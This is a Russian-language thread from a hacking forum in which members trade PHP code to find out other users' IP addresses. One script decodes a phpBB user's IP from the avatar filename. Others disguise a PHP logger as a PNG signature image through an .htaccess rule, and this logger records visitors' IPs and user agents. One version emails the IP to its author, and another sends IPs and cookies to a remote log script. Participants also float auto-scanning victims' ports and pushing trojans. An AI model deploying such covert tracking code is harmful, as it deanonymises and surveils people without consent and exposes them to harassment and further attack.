Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   узнаем IP в phpBB (https://forum.antichat.xyz/showthread.php?t=41164)

Scipio 29.05.2007 21:43
узнаем IP в phpBB
 
Небольшой скрипт, для того, что бы узнать IP пользователя на форуме phpBB... есть 3 нюанса:

1. Узнать IP можно только у пользователя с аватарой... (причем IP на тот момент, когда он аватару прекреплял)

2. Работает не на всех форумах, но на подавляющем большинстве...

3. Вводить нужно не номер пользователя в списке пользователей, а его id

вот код:
Код:
<html>

<head>
  <title></title>
</head>

<body>

 <?php
error_reporting(E_ALL);
set_time_limit(0);
echo "<pre>";
$k=$PHP_SELF;
$pr='';
$ip='';
$pat='/(http:\/\/)?([^\/]+)/i';
if (!isset($adr)){$adr='';}
echo "by Scipio<br>\n\n\n";
echo "<form action='".$k."' method='post'>";
echo "<p>путь к форуму:<br>";
echo "<input type='text' name='adr' value='".$adr."'/><br><br>";
echo "id пользователя:<br>";
echo "<input type='text' name='id'/><br><br>";
echo "<input type='submit' name='submit' value='Жмем и пробуем' />";
echo "</p>";
if (!isset($id)){die;}
if (empty($adr) or empty($id))
  {die ("не все поля заполнены");}
    else
  {$adr=trim($adr);
    preg_match($pat,$adr, $matches);
    @$pr= $matches[1];
    @$host = $matches[2];
    $qr=explode($pr.$host,$adr);
    $qveria=$qr[1];
    empty($qveria)?$qveria='/':$qveria=$qveria;
    $ock=fsockopen($host,80);
    $pac="GET ".$qveria."/"."profile.php?mode=viewprofile&u=".$id." HTTP/1.0\r\nHost: ".$host."\r\n\r\n";
    fputs ($ock,$pac);
            while (!feof($ock))
                {
                //echo fgets ($ock,128);
                $st=fgets ($ock,128);
               
                if (preg_match("/avatars\//i",$st,$_8)) {
                      $cod=explode($_8[0],$st);
                      $cod=substr($cod[1],0,8);


                for ($i=0;$i<8;$i=$i+2)
                    {$ipd=$cod{$i}.$cod{$i+1};
                    $ip=$ip.hexdec($ipd).'.';


                        }

                  }

                }
    fclose ($ock);
      }
      if (!empty($ip)){  $ip=substr_replace($ip, '', strlen($ip)-1);
      echo "ip:".$ip."<a href=http://old.antichat.ru/util/whois/?ip=".$ip.">[whois]</a>";}else{die("узнать ip не удалось");}

echo "</pre>";

?>

</body>

</html>
Не судите строго, если комуто понадобится... буду улучшать и может быть переведу на perl...

yeti 29.05.2007 23:08
Смотри в чем дело.. Ip у всех динамический.. Не легче сделать что-то типа тойже картинки(это я к примеру) и просто скрипт ведения логов сделать. тогда уж будет гарантированно узнавать Ip.. Вроде видела где-то.. Да и СИ никто не отменял..

Scipio 29.05.2007 23:17
Цитата:
Сообщение от Shnurovka
Смотри в чем дело.. Ip у всех динамический.. Не легче сделать что-то типа тойже картинки(это я к примеру) и просто скрипт ведения логов сделать. тогда уж будет гарантированно узнавать Ip.. Вроде видела где-то.. Да и СИ никто не отменял..
ip - то динамический, но вот подсеть чаще всего не меняется...
для абуза сойдет...

и еще... ты немного не поняла сам код... тут айпи получается из названия файла-аватары

yeti 29.05.2007 23:21
Scipio, да, код я вполне возможно не поняла.. но.. все же.. учусь понемногу. И предложила альтернативный метод..

ну подсеть-то да..

Knight_of_Darkness 29.05.2007 23:58
Цитата:
Сообщение от Shnurovka
Смотри в чем дело.. Ip у всех динамический.. Не легче сделать что-то типа тойже картинки(это я к примеру) и просто скрипт ведения логов сделать. тогда уж будет гарантированно узнавать Ip.. Вроде видела где-то.. Да и СИ никто не отменял..
/* если чето и получится наподобие, то логи должны вестись на серваке */
И при чем тут СИ?

Petr 30.05.2007 00:14
Хм, а у меня друга идея появилась, вы когд-нибудь видели картинки в подписях, типо там ваш айпи светится, можно такую картинку сделать и маршуритизировать через скрипт каторый будет отлавливать пакет и данные сохронять где-нибудь на фтп.
Даже думаю можно сделать так (но это уже труднея, я даже плохова-то знаю как) чтобы и ник человека в лог писался.
Если кто реализует, напиши-те что идея моя.

Scipio 30.05.2007 00:20
Цитата:
Сообщение от Sandjuro
Хм, а у меня друга идея появилась, вы когд-нибудь видели картинки в подписях, типо там ваш айпи светится, можно такую картинку сделать и маршуритизировать через скрипт каторый будет отлавливать пакет и данные сохронять где-нибудь на фтп.
Даже думаю можно сделать так (но это уже труднея, я даже плохова-то знаю как) чтобы и ник человека в лог писался.
Если кто реализует, напиши-те что идея моя.
Это можно... (мож кто так и делает) вопрос втом, можно ли с серва коннектится к чужим сокетам, да и ник не узнаешь... так как идентификация идет по кукам (и ip иногда), а там ники не прописываются, хотя могут быть и исключения

2all Ну как скрипт работает?

yeti 30.05.2007 00:24
Sandjuro, ну почему трудно? вот я например отлично знаю, что моя подпись... она идет с самшита, а туда IP пишется. логи кароч.. примерно про это и говорила.. еще можно просто оформить не как подпись, а так.. ссылочку пихнуть, а кто туда заходил - логи сделать! в общем, способов много!

Petr 30.05.2007 00:27
Scipio, Ладно потправим идею, Делаем скрипт для определения айпи, Делаем картинку каторая работает с этим скриптом, + возможно чтобы он айди юзера собирал? это ж уже свой будет скрипт с картинкой, а картинку можно любую, чтобы даже не палили что это не просто картинка :)
Ах да, потом этотот скрипт может перенаправлять все по данному адресу (каторый впишем) и там уже сработает обычный php файлик каторый все красиве в txt и упакует
Как тебе такая идея?

Scipio 30.05.2007 00:38
ну типа активной Xss`ки? вот узерид можно... на атичате они в куки пишутся, но имхо не везде... а попробовать можно... послушать бы админов античата?

Petr 30.05.2007 00:46
Нет, не Xss, Ладно для уточнения так скажу, ты можеш забацать такуежу картинку чтобы она айпи опредиляла и коннект был с твоим серваком

gemaglabin 30.05.2007 00:51
Вы наконец поняли как узнать айпи хакера???Надо чтобы потом сразу же порты сканировались и авторутер запускался и потом логи по почте лучше бандеролью.

Petr 30.05.2007 00:55
Цитата:
Надо чтобы потом сразу же порты сканировались
Ты писал как стеб, но меня на идею автоматического впаривания трояна появилась, но это потом ;)

yeti 30.05.2007 01:01
Scipio, нее.. xss'ка - это другое.. там уже все куки прет же, и к томуже сниффер нужен. Это уже уязвимости юзает, а следовательно способ имеет ряд недостатков и неуниверсален. И он не тупо IPшник узнает.. так что.. делаем выводы сами..

ну вот к примеру, чтобы узнать Ip мы же не будем у булки(считается одним из самых безопасных форумов) искать уязвимости... Правильно? нам легче картинку залить. или ссылочку..

Scipio 30.05.2007 01:02
ты это имелл ввиду?
Код:
<?php
Header("Content-type: image/png");
$string="$REMOTE_ADDR";
$tex="Scipio has your ip";
$img = ImageCreateFromPng("image.png");
$colr = ImageColorAllocate($img, 225, 225, 225);
mail("scipio@example.com", "log", $string);
ImageString($img,3,75,43, $tex,$colr);
ImagePng($img);
ImageDestroy($img);
?>
?

Petr 30.05.2007 01:04
Scipio, Ну как я понял он узнает айпи и перешлет тебе на почту, узника в подпись себе такую, и скажи сработало.
Этот способ помоему намного актуальней

yeti 30.05.2007 01:05
Scipio, один из методов по сути..

Scipio 30.05.2007 01:07
Цитата:
Сообщение от Sandjuro
Scipio, Ну как я понял он узнает айпи и перешлет тебе на почту, узника в подпись себе такую, и скажи сработало.
Этот способ помоему намного актуальней
Не думаю, что все позволят так просто почту отправлять... да и в пхпББ нет картинок-подписей

так почту бомбить можно было бы...

Petr 30.05.2007 01:09
Цитата:
Сообщение от Scipio
Не думаю, что все позволят так просто почту отправлять... да и в пхпББ нет картинок-подписей
Ок, а если аватарка, загрузить её с помощью веб ссылки...Хотя нет, с аватакой может и не прокатить, там уже примудрости в том что она загрузится, или если указывать ссылку на аватарку то она не грузится на серв где форум?
в любом случии не обезательно на почту, лучше в лог, а то отписавшись в популярной теме с просмотрами в 1000, хуже спама будет.
Можеш тут юзнуть этот способ?

yeti 30.05.2007 01:29
Scipio, впринципе.. даже самый простенький фаер не позволит долбиться чему-либо непонятному на SMTP.. но ведь форум - это форум.. хотя у хостера вроде фаеры стоят. нет.. лучше сделать тупо на хостинг..

c411k 30.05.2007 01:45
мой зайчег сполил ваши ип )

http://eprst.fatal.ru/upload/palevo/a3.png

http://eprst.fatal.ru/upload/palevo/der.txt

a3.png
PHP код:
<?
$f "der.txt";

$r_add $_SERVER['REMOTE_ADDR'];
$real_ip htmlspecialchars($_SERVER['HTTP_X_FORWARDED_FOR']);
$agent htmlspecialchars($_SERVER['HTTP_USER_AGENT']);
$c "ip [".$r_add."] agent [".$agent."] real_ip".$real_ip." time [".date("d.m.Y H:i:s")."]\r";
function put_file_content($filename$content)
{
    $fp fopen($filename"a");
    fputs($fp$content);
    fclose($fp);
    return true;
}
put_file_content($f$c);

Header("Content-type: image/png");
$im ImageCreateFromPng("6.png");
      ImagePng($im);
      ImageDestroy($im);
?>
.htaccess
Код:
AddType application/x-httpd-php .png
зы. написал, а забыл отпостить =\
зыы.
Цитата:
Сегодня 01:02
Scipio
сразу мог это написать ведь, а не изврощаться ;)

Petr 30.05.2007 01:54
А если на хосте нет .htaccess, то просто создать файл с болокнота? и в корень?
+ Вообщем у меня опять идеи есть, но нехрина я кодить не умею :(
вот гавно-то

yeti 30.05.2007 02:00
c411k, тема! Я даже все поняла.. А то вечно у меня все криво выходит.. ))

Scipio 30.05.2007 02:01
<?php
Header("Content-type: image/png");
$string=$REMOTE_ADDR;
$cooc=$_COOKIE;
$tex="Scipio has your ip";
$img = ImageCreateFromPng("image.png");
$colr = ImageColorAllocate($img, 225, 225, 225);
$ock=fsockopen($host,80);
$pac="GET /log.php?ip=".$string."&coo=".$cooc." HTTP/1.0\r\nHost: blabla.ru\r\n\r\n";
fputs ($ock,$pac);
ImageString($img,3,75,43, $tex,$colr);
ImagePng($img);
ImageDestroy($img);
?>


ну только вот че придумал

меня блин опередили

да чето я забыл что пхп скрипт на удаленном хосте... крыша едет :confused:

Scipio 30.05.2007 02:09
Цитата:
Сообщение от c411k
мой зайчег сполил ваши ип )

сразу мог это написать ведь, а не изврощаться ;)
Это ты про че?

кстати куки получить не удастся... т.к. куки идут с сайта, на котором скрипт-картинка находится... а по другому, как получить id пользователя я не знаю...

даже скорее знаю, что никак...

а в остольном все работает

мой скрипт немного отличается от скрипта c411k, но не пренципиально, так что приводить его здесь я думаю не стоит...

да и еще раз повторюсь... на phpBB такая тема не катит, так что пользуйте 1-й скрипт... Да и вобще это разные вещи... с банером - это сниффер, а 1-й скрипт определения IP


Время: 01:01